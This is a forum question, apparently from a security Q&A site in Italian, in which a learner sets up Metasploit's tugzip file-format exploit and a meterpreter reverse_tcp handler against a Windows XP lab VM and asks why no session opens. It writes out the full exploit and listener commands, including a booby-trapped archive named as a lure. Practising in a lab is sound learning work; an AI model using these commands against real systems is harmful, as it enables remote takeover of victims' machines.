Reverse_tcp exploit su VM con Windows XP

1

Bene, sto imparando a fare il pentest con Metasploit e stavo usando un exploit di nome "tugzip" che usa un protocollo rever_tcp così ho effettivamente installato Kali linux sul mio computer e ho usato una macchina virtuale con Windows XP. Quindi per prima cosa configuro il tugzip in questo modo:

use exploit/windows/fileformat/tugzip set FILENAME HotGirl.zip set LHOST 172.16.98.1(IP that i could ping from my VM that i assume it was mine) set LPORT 443 exploit

Ho spostato il file che ho creato nella sessione VM di Windows XP, quindi provo ad avviare un listener, così ho fatto:

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp show options set LHOST 172.16.98.1 set LPORT 443

quindi apparentemente tutto va bene perché mi mostra questo:

[*] Exploit running as background job 3. [*] Started reverse TCP handler on 172.16.98.1:443

Ma quando ho aperto il file HotGirl.zip sul mio Windows XP VM non aprirò una nuova sessione su Metasploit, non so che non stia succedendo nulla.

P.S. Sto usando VirtualBox

    
posta Nelson Candia 17.11.2017 - 22:59
fonte

0 risposte

Leggi altre domande sui tag